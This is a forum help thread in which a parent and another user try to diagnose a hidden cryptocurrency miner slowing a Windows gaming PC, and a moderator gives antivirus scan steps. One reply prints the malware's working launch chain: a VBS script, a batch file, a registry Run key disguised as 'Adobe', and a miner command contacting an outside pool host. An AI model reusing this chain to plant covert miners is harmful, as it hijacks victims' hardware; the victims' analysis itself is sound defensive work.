Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

When gaming display locks up, pc makes sound - also found this - phatk110722GeForce starting rundll32


  • Please log in to reply
3 replies to this topic

#1 figueroa4

figueroa4

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:52 PM

Posted 16 December 2012 - 04:57 PM

This is my son's computer. He has Fallout New Vegas on it and recently when he plays it for awhile the display pixelates? and freezes, the pc itself makes a strange sound and we have to manually turn off the pc for a bit. He noticed that when he turns it back on that the rundll32 is running at over 70% before doing anything. I looked up and found out about Process Explorer which shows this for the rundll32:

rundll32.exe -k phatk -o http://ferm.chickenkiller.com:80 -u ferm1 -p 12345 -I 1

He has avast! Antivirus scanner and I am currently running that and Malwarebytes to run after.

Windows 7 64 bit(desktop pc)
4gb ram
3 ghz AMD cpu

Thanks!

BC AdBot (Login to Remove)

 


#2 qwynbleid

qwynbleid

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:52 AM

Posted 03 January 2013 - 05:48 PM

Greetings,

Firstly, I would like to ask, did you find anything and if so, what?
Then unfortunately I seem to be experiencing the exact same problem as you and I did do a little manual digging which resulted in the following knowledge:

The program has added itself to the start up of the system, under msconfig, startup, look for
Startup item: Adobe; Manufacturer: Unknown; Command: c:\programdata\adob\color.vbs (un-marking it may yield results with it not starting at least but I am not sure if there are other safeguards in place)

Now OBVIOUSLY this has nothing to do with adobe, especially since I don't have any product of theirs, not even the flash player and besides the real adobe folder would be c:\programdata\Adobe, checked on a friends PC.

That color.vbs is a visual basic script file and peering inside reveals it does the following:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\ProgramData\adob\start.bat", 0, false

Which translates to running start.bat in that folder if I'm not mistaken, then the code in the bat file is:

regedit.exe /s 123.reg
ping 127.0.0.1 -n 60
CD C:/ProgramData/adob
rundll32.exe -k phatk -o http://ferm.chickenkiller.com:80 -u ferm1 -p 12345 -I 1

so it opens up windows' registry editor adds(after looking in the mentioned registry file)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe"="C:\\ProgramData\\adob\\color.vbs"

It then proceeds to ping your localhost 60 times, why? Who knows.
("127.0.0.1 is the loopback Internet protocol (IP) address also referred to as the “localhost.” The loopback construct gives a computer or device capable of networking the capability to validate or establish the IP stack on the machine.")

then it changes the directory it is working in to C:/ProgramData/adob and proceeds to run a custom rundll32.exe(from that directory), note, this is NOT the rundll windows uses, windows uses the 1 in the system 32 folder although that one can also become infected of course. IF and how this exe file was customized remains a hexadecimal mystery, that is because I can only view the code in hexadecimal and from that I can't really tell you anything at all.

If I remember correctly the base use of rundll32 is to well, run dll files, which of course each contain programming code of their own. The 3 dll files this specific folder is
libcurl-4.dll
libpdcurses.dll
libpthread-2.dll

also present are 2 bin files,

phatk110722GeForce GTX 580v1w256long4.bin
phatk110722Redwoodbitalignv2w128long4.bin

and

phatk110722.cl
poclbm110717.cl

now phatk110722GeForce GTX 580v1w256long4.bin will most definitely differ from different pc's because it names the gpu currently in the machine(at least for me it does)

Sigh, now Poclbm (PyOpenCL bitcoin miner) is a python GPU bitcoin miner that uses the OpenCL framework to quickly perform the hashing computations. Works with AMD - 4xxx and up, Nvidia - 8xxx and up, video cards.

But this is not what we are dealing with, this guy is simply using code from the open source project to do hashing computations? on our gpu's? If I were to take an extremely wild guess here that is. Some PC's might not really be all that affected then as some GPU's aren't supported. But I digress. I am a bit tired will probably look into it further tomorrow.

Also treminating the rundll32.exe process that is eating up our CPU's and perhaps GPU's seems to stop the problem until you restart(but removing it from startup in msconfig should fix that, regardless this might just be the tip of the iceberg and as such I need to know more about what this thing is actually doing, for the sake of my sanity).

Edited by qwynbleid, 03 January 2013 - 05:54 PM.


#3 qwynbleid

qwynbleid

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:52 AM

Posted 03 January 2013 - 05:56 PM

Additionally any help from anybody would be appreciated, thank you.

Also running
Windows 7 professional(With latest updates so :/)
GTX 580
i7 950 (from the old lga 1366 architecture)
6gb ram

Edited by qwynbleid, 03 January 2013 - 05:59 PM.


#4 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,493 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:06:52 PM

Posted 04 January 2013 - 02:30 PM

Hello, t looks like a malware file ,so I suggest running these next.


I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the Posted Image button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the Posted Image
      icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

NOTE:Sometimes if ESET finds no infections it will not create a log.




Running GMER on 32 and 64 bit Systems

--------------------

Please download GMER from one of the following locations and save it to your desktop:

  • Main Mirror which will download a randomly named file
  • Zipped Mirror - Unzip the file to its own folder such as C:\gmer
  • Disconnect from the Internet and close all running programs
  • Temporarily disable any real-time active protection
  • It is very important you do not use your computer while GMER is running
  • Double-click on the randomly named GMER Posted Image icon
  • GMER will open to the Rootkit/Malware tab and perform an automatic quick scan
  • If you receive a warning about rootkit activity and are asked to fully scan your system click NO
  • Please check in the Quick scan box
  • Please uncheck the following:
    • IAT/EAT
    • Show All <<< Important
    Posted Image
  • Click Scan
  • If you see a rootkit warning window click OK
  • When the scan is finished, Save the results to your desktop as gmer.log
  • Click Copy then paste the results in your reply
  • Exit GMER and be sure to re-enable your Antivirus, Firewall and any other security programs you had disabled
Note:
  • If you encounter any problems, try running GMER in Safe Mode
  • If GMER crashes or keeps resulting in a Blue Screen of Death, uncheck Devices on the right side before scanning

How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users